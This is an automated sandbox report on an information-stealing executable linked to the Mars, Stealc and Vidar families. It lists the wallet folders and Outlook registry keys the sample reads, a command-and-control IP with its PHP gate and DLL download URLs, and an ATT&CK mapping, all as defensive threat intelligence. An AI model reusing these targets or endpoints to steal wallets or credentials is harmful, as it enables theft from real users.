Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: q27UFusYdn.exe PID: 6672, type: MEMORYSTR

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 0.2.q27UFusYdn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.43e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.43e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.q27UFusYdn.exe.4410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.q27UFusYdn.exe.4410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1631316383.0000000004410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: q27UFusYdn.exe PID: 6672, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.q27UFusYdn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.43e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.43e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.q27UFusYdn.exe.4410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.q27UFusYdn.exe.4410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1631316383.0000000004410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: q27UFusYdn.exe PID: 6672, type: MEMORYSTR

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CEE0C40 sqlite3_bind_zeroblob,	0_2_6CEE0C40
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CEE0D60 sqlite3_bind_parameter_name,	0_2_6CEE0D60
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CE08EA0 sqlite3_clear_bindings,	0_2_6CE08EA0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CEE0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6CEE0B40

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Email Collection	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	4 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	144 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
q27UFusYdn.exe	40%	Virustotal		Browse
q27UFusYdn.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal	Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal	Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal	Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal	Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal	Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://mozilla.org0/	0%	URL Reputation	safe
http://185.172.128.111/8e6d9db21fb63946/freebl3.dll	2%	Virustotal		Browse
http://185.172.128.111/f993692117a3fda2.phpt	3%	Virustotal		Browse
http://185.172.128.111/f	5%	Virustotal		Browse
http://185.172.128.111/8e6d9db21fb63946/nss3.dll	2%	Virustotal		Browse
http://185.172.128.111/f993692117a3fda2.	5%	Virustotal		Browse
http://185.172.128.111/8e6d9db21fb63946/sqlite3.dll	2%	Virustotal		Browse
http://185.172.128.111/8e6d9db21fb63946/softokn3.dll	1%	Virustotal		Browse
http://185.172.128.111/8e6d9db21fb63946/mozglue.dll	1%	Virustotal		Browse
http://185.172.128.111/8e6d9db21fb63946/msvcp140.dll	2%	Virustotal		Browse
http://185.172.128.111	7%	Virustotal		Browse
http://185.172.128.111/f993692117a3fda2.php	12%	Virustotal		Browse
http://185.172.128.1	0%	Virustotal		Browse
http://185.172.128.111/8e6d9db21fb63946/vcruntime140.dll	1%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.172.128.111/8e6d9db21fb63946/softokn3.dll	true	1%, Virustotal, Browse	unknown
http://185.172.128.111/8e6d9db21fb63946/freebl3.dll	true	2%, Virustotal, Browse	unknown
http://185.172.128.111/8e6d9db21fb63946/sqlite3.dll	true	2%, Virustotal, Browse	unknown
http://185.172.128.111/8e6d9db21fb63946/nss3.dll	true	2%, Virustotal, Browse	unknown
http://185.172.128.111/8e6d9db21fb63946/mozglue.dll	true	1%, Virustotal, Browse	unknown
http://185.172.128.111/8e6d9db21fb63946/msvcp140.dll	true	2%, Virustotal, Browse	unknown
http://185.172.128.111/f993692117a3fda2.php	true	12%, Virustotal, Browse	unknown
http://185.172.128.111/8e6d9db21fb63946/vcruntime140.dll	true	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	false		high
https://duckduckgo.com/ac/?q=	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	false		high
http://185.172.128.111/8e6d9db21fb63946/vcruntime140.dllc	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111/8e6d9db21fb63946/softokn3.dll0	q27UFusYdn.exe, 00000000.00000002.2177189575.000000000417A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	q27UFusYdn.exe, 00000000.00000003.1696843810.00000000245CD000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	false		high
http://185.172.128.111/f993692117a3fda2.phpt	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
http://185.172.128.111/f	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	true	5%, Virustotal, Browse	unknown
http://185.172.128.111/f993692117a3fda2.phprowser	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.1Z	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	false		low
http://185.172.128.111/f993692117a3fda2.phpdpoint	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111/f993692117a3fda2.php$	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	false		high
http://185.172.128.111/8e6d9db21fb63946/mozglue.dllt5C	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111/f993692117a3fda2.y	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111/8e6d9db21fb63946/nss3.dllF5U	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.sqlite.org/copyright.html.	q27UFusYdn.exe, 00000000.00000002.2196065330.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2187081048.000000001E64A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.172.128.111/f993692117a3fda2.phpodus.wallet	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.mozilla.com/en-US/blocklist/	q27UFusYdn.exe, q27UFusYdn.exe, 00000000.00000002.2196180891.000000006CD6D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		high
http://185.172.128.111/f993692117a3fda2.	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	true	5%, Virustotal, Browse	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	false		high
http://185.172.128.111/f993692117a3fda2.phpA	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111/f993692117a3fda2.a	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://185.172.128.111/f993692117a3fda2.php62dda440aa63685631b0723d92e0release	q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	q27UFusYdn.exe, 00000000.00000003.1696843810.00000000245CD000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	false		high
https://www.ecosia.org/newtab/	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	false		high
http://185.172.128.111/f993692117a3fda2.Q	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111/f993692117a3fda2.phpl?	q27UFusYdn.exe, 00000000.00000002.2177189575.000000000417A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111	q27UFusYdn.exe, 00000000.00000002.2177115350.000000000411E000.00000004.00000020.00020000.00000000.sdmp	true	7%, Virustotal, Browse	unknown
https://ac.ecosia.org/autocomplete?q=	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	false		high
http://185.172.128.111/f993692117a3fda2.I	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.1	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
http://185.172.128.111/f993692117a3fda2.phpd	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111/f993692117a3fda2.phpb	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111/f993692117a3fda2.A	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111/f993692117a3fda2.phpL	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111/f993692117a3fda2.phpPrograms	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.172.128.111/f993692117a3fda2.9	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org	FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	false		high
http://185.172.128.111/f993692117a3fda2.phpT	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	false		high
http://185.172.128.111/f993692117a3fda2.phpR	q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.172.128.111	unknown	Russian Federation		50916	NADYMSS-ASRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430186
Start date and time:	2024-04-23 09:26:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	q27UFusYdn.exe renamed because original name is a hash value
Original Sample Name:	bb88997d394c01230d90aa731f4e8837.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/38@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 79 Number of non-executed functions: 232
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:27:48	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.111	WF2R8Bsptu.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111/f993692117a3fda2.php
	5F25UVdGxt.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111/f993692117a3fda2.php
	3Auu6AZo1i.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111/f993692117a3fda2.php
	4RiX1XghdP.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111/f993692117a3fda2.php
	wKn3WL0NwV.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111/f993692117a3fda2.php
	JgR458zggg.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111/f993692117a3fda2.php
	67Do6SyY1y.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111/f993692117a3fda2.php
	0kTnBPeXlA.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111/f993692117a3fda2.php
	zrmEEnweA9.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111/f993692117a3fda2.php
	QO00rh2SEG.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111/f993692117a3fda2.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NADYMSS-ASRU	ipR98bCqps.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	5SLBlv4aUS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	XAcuSo8KDa.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	WF2R8Bsptu.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	5F25UVdGxt.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	f0FSseHktD.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	wipOhNpHIG.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	8OeyVwIM3t.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	f6pwu0HWXe.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	V9TdcUeNlV.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	185.172.128.59

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	ipR98bCqps.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	5SLBlv4aUS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	XAcuSo8KDa.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	WF2R8Bsptu.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	5F25UVdGxt.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	f0FSseHktD.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	wipOhNpHIG.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	8OeyVwIM3t.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	f6pwu0HWXe.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	V9TdcUeNlV.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
C:\ProgramData\mozglue.dll	ipR98bCqps.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	5SLBlv4aUS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	XAcuSo8KDa.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	WF2R8Bsptu.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	5F25UVdGxt.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	f0FSseHktD.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	wipOhNpHIG.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	8OeyVwIM3t.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	f6pwu0HWXe.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	V9TdcUeNlV.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse

Created / dropped Files

C:\ProgramData\CBAKJEHDBGHIEBGCGDGH

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
